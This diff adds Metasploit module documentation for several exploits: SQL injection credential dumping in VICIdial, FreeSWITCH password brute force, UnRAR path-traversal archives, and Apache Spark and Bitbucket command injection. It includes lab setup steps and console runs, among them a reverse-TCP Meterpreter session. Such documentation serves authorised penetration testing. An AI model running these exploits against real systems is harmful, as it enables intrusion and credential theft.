+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
@@ -5,6 +5,8 @@ default username and password.  Tested against Dell Remote Access:

 - Controller 6 - Express version 1.50 and 1.85,
 - Controller 7 - Enterprise 2.63.60.62
+- Controller 8 - Enterprise 2.83.05
+- Controller 9 - Enterprise 4.40.00.00

 ## Verification Steps

@@ -0,0 +1,212 @@
+## Vulnerable Application
+
+This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
+svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
+
+- Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
+- Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
+- Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
+- Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
+- Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
+
+|                                           | v9.0.3                         | v10.0.0                        |
+| ----------------------------------------- | ------------------------------ | ------------------------------ |
+| List Users - access_recordings method     | X                              | X                              |
+| List Users - agent_time_sheet method      | `view reports` must be enabled | `view reports` must be enabled |
+| List Users - agentcall_email method       | X                              | X                              |
+| List Users - modify_email_accounts method | X                              | X                              |
+| List Users - user_stats method            | `view reports` must be enabled | `view reports` must be enabled |
+
+VICIdial does not encrypt passwords by default.
+
+VICIBox/VICIdial includes an auto-update mechanism, so be aware for creating vulnerable boxes.
+
+### Install
+
+#### 9.0.3 & 10.0.0
+
+1. Install the following OpenSUSE 10 ISO [ViciBox_v9.x86_64-9.0.3.iso](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9.x86_64-9.0.3.iso)
+or [ViciBox_v10.x86_64-10.0.0.iso](http://download.vicidial.com/iso/vicibox/server/archive/ViciBox_v10.x86_64-10.0.0.iso) :
+    1. Change the default password (`root`:`vicidial`)
+    2. Set Timezone, Keyboard Layout, ok the license, and Language
+    3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the 
+        command `yast lan` if necessary
+2. Run `vicibox-express` to initiate the ViciDial Express Installation, everything can be kept as default
+3. Navigate to `http://<ip-address>/`
+    1. Click `Administration` and login with default credentials username: `6666`, password: `1234`
+    2. Once logged in, Click `Continue on to the Initial Setup`. Everything can be kept as default. 
+4. The complete list of setup instructions can be found by following this [link](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9-install.pdf)
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/vicidial_multiple_sqli`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. Do `show actions`
+   1. Select from the list or keep the default
+1. Do: `run`
+1. The module will exploit the selected SQL injection and return the extracted usernames and passwords
+
+## Options
+
+### Password
+
+Password for the vicidial instance that corresponds to the username.
+
+### Username
+
+Username for the user to login with. Defaults to admin username of `6666`.
+
+## Scenarios
+
+### ViciBox 9.0.3 - List Users - modify_email_accounts method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
+action => List Users - modify_email_accounts method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Time-based injection: expecting output of length 46
+[!] No active DB -- Credential data will not be saved!
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - access_recordings method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
+action => List Users - access_recordings method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agent_time_sheet method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
+action => List Users - agent_time_sheet method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agentcall_email method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
+action => List Users - agentcall_email method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+### ViciBox 9.0.3 - List Users - user_stats method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
+action => List Users - user_stats method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,74 @@
+## Vulnerable Application
+BACnet is a Data Communication Protocol for Building Automation and Control Networks.
+Developed under the auspices of the American Society of Heating,
+ Refrigerating and Air-Conditioning Engineers (ASHRAE), BACnet is an American national standard,
+ a European standard, a national standard in more than 30 countries, and an ISO global standard.
+ The protocol is supported and maintained by ASHRAE Standing Standard Project Committee 135
+
+This script polls bacnet devices with a l3 broadcast Who-is message
+and for each reply communicates further to discover more data and saves the data into metasploit.
+Each bacnet device responds with this data:
+- It's IP address, and BACnet/IP address (if the device is nested).
+- It's device number.
+- Model name.
+- Application software version.
+- Firmware revision.
+- Device description.
+## Verification Steps
+
+  1. Start msfconsole.
+  2. Do: `use auxiliary/scanner/scada/bacnet_l3`.
+  3. Do: `set INTERFACE`.
+  5. Do: `run`.
+  6. Devices running the BACnet protocol should respond with data.
+
+## Options
+A user can choose between the interfaces of his host (e.g. eth1, ens192...),
+the number of Who-is packets to send - for reliability purposes, the time (in seconds) to wait for packets to arrive
+and the UDP port, the default is 47808.
+
+The user can always check these options via the `show options` command.
+
+```
+msf auxiliary(profinet_siemens) > show options
+
+Module options (auxiliary/scanner/scada/bacnet_l3):
+
+Name       Current Setting  Required  Description
+----       ---------------  --------  -----------
+COUNT      1                yes       The number of times to send each packet
+INTERFACE  eth1             yes       The interface to scan from
+PORT       47808            yes       BACnet/IP UDP port to scan (usually between 47808-47817)
+TIMEOUT    1                yes       The socket connect timeout in seconds
+```
+
+## Scenarios
+
+The following demonstrates a basic scenario, we "detect" two devices:
+
+```
+
+msf > use auxiliary/scanner/scada/bacnet_l3
+msf auxiliary(auxiliary/scanner/scada/bacnet_l3) > run
+
+[*] Broadcasting Who-is via eth1
+[*] found 2 devices
+[*] Querying device number 826001 in ip 192.168.13.11
+[*] Querying device number 4194303 in ip 192.168.13.12
+[*] Done scanning
+[+] for asset number 826001:
+        model name: iSMA-B-4U4A-H-IP
+        firmware revision: 6.2
+        application software version: GC5 6.2
+        description: BACnet iSMA-B-4U4A-H-IP Module
+
+[+] for asset number 4194303:
+        model name: PXG3.L-1
+        firmware revision: FW=01.21.30.38;WPC=1.4.131;SVS-300:SBC=13.21;
+        application software version:
+        description: BacnetRouter
+
+[+] Successfully saved data to local store named bacnet-discovery.xml
+[*] Done.
+[*] Auxiliary module execution completed
+```
@@ -25,6 +25,35 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -node
 If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
 IP and hostname to your hosts file.

+### Using docker
+
+Using the environment created by [vulhub](https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160)
+
+First create a new docker-compose file:
+
+```
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   ports:
+    - "8080:80"
+    - "8443:443"
+```
+
+Then run `docker-compose up` and verify that the service is running with:
+
+```
+$ curl https://localhost:8443 -k
+<html>
+<head><title>404 Not Found</title></head>
+<body bgcolor="white">
+<center><h1>404 Not Found</h1></center>
+<hr><center>nginx/1.11.13</center>
+</body>
+</html>
+```
+
 ## Verification Steps

  1. Install a vulnerable OpenSSL, start the service
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.
+
+## Verification Steps
+
+To generate the .rar file:
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
+TARGET_PATH => ../../../../../../tmp/docstest.txt
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../tmp/docstest.txt
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then, with a vulnerable versions of UnRAR (see the link above), extract it:
+
+```
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+Extracting from /home/ron/.msf4/local/payload.rar
+
+Extracting  hhgdzigwkgv                                               OK 
+Extracting  hhgdzigwkgv                                               OK 
+All OK
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
+lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt
+
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
+/tmp/docstest.txt: data
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate, typically it's `payload.rar` and that works fine.
+
+### `TARGET_PATH`
+
+The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
+
+### `SYMLINK_FILENAME`
+
+If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.
+
+### `CUSTOM_PAYLOAD`
+
+If set, instead of encoding the configured payload, encode data from the given filename.
+
+## Scenarios
+
+This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
+
+We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.
+
+### Built-in payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
+TARGET_PATH => ../../../../../../../../tmp/evil.bin
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../tmp/evil.bin
+[*] Encoding configured payload
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  xkmcxqotn                                                 OK 
+Extracting  xkmcxqotn                                                 OK 
+All OK
+ron@fedora ~/.msf4/local $ file /tmp/evil.bin
+/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+### Custom payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
+TARGET_PATH => ../../../../../../../../tmp/evil.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
+CUSTOM_PAYLOAD => /tmp/test.sh
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  jwbhkf                                                    OK 
+Extracting  jwbhkf                                                    OK 
+All OK
+ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
+ron
+/tmp/evil.sh: line 4: $'\177P\336': command not found
+[...]
+```
+
+(The errors at the bottom are because we append random junk to the end for padding)
+
+
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
+With an authentication filter, this checks whether a user has access permissions to view or modify the application.
+The permission check is coded using a bash command shell and the unix id command that allows a malicious shell command injection.
+
+Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application,
+but unfortunately this configuration setting triggers the vulnerable code below.
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
+  }
+}
+```
+
+This will result in arbitrary shell command execution as the user `Spark`.
+
+This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
+
+Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.
+
+To set the server up use the following docker-compose.yml file and follow the steps below:
+```
+version: '2'
+
+services:
+  spark:
+    image: docker.io/bitnami/spark:3.1.1
+    environment:
+      - SPARK_MODE=master
+      - SPARK_RPC_AUTHENTICATION_ENABLED=no
+      - SPARK_RPC_ENCRYPTION_ENABLED=no
+      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
+      - SPARK_SSL_ENABLED=no
+    ports:
+      - '8080:8080'
+```
+
+1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
+1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
+1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
+1. cat the contents of spark-defaults.conf to make sure it looks good.
+1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
+1. Once the containers have powered down gracefully, rerun `docker-compose up`
+
+Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...
+
+## Verification Steps
+
+1. `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell or meterpreter as the `spark` user.
+
+## Options
+
+No specific options to be set.
+
+## Scenarios
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit with spark.acls.enable set to true
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[*] Perform sleep test of 10 seconds...
+[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
+[*] Exploiting...
+[*] Sending stage (40164 bytes) to 192.168.100.43
+[-] Meterpreter session 3 is not valid and will be closed
+[*] 192.168.100.43 - Meterpreter session 3 closed.
+[*] Sending stage (40168 bytes) to 192.168.100.43
+[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000
+
+meterpreter > sysinfo
+Computer     : 7a26a9fb7ce3
+OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: spark
+```
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit WITHOUT the spark.acls.enable option
+
+Note: This version is vulnerable, however the `spark.acls.enable` option is not set, hence the vulnerable code will not be triggered.
+Response on POST payload request will be 200 instead of 403.
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(inux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The 192.168.100.43:8080 did not respond a 403 response. "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
+```
+
+## Limitations
+The check to determine if the application is vulnerable is based on a 403 response and the execution of a randomized `sleep` command.
+The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
+Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.
+
+Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+Various versions of Bitbucket Server and Data Center are vulnerable to
+an unauthenticated command injection vulnerability in multiple API endpoints.
+
+The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+creates an archive of the repository, leveraging the `git-archive` command to do so.
+Supplying NULL bytes to the request enables the passing of additional arguments to the
+command, ultimately enabling execution of arbitrary commands.
+
+According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
+
+  Any version released after version `6.10.17` and before:
+          * `7.6.17`
+          * `7.17.10`
+          * `7.21.4`
+          * `8.0.3`
+          * `8.1.3`
+          * `8.2.2`
+          * `8.3.1`
+
+Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
+    
+### Installation Instructions
+
+1. Install Git on the target machine
+  * sudo apt install -y git
+2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
+[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
+3. Make sure the resulting bin file is executable and run it
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990
+
+### Vulnerable Setup
+
+1. Log into Bitbucket with your administrator credentials
+2. Once logged in, select `Projects` at the top menu
+3. Select `Create project`
+4. Enter a name for the project and click `Create project`
+5. On the next page, select `Create repository`
+6. Enter a name for the repository and select `Create repository`
+7. Follow the instructions to clone the repository and push data to the repository so it is not empty
+8. Click the gear on the left side of the next page
+9. Select `Repository permissions` under `Security` on the left
+10. Underneath `Public access`, check `Enable` to make the repository public
+
+Bitbucket should now be exploitable
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
+4. Do: `run`
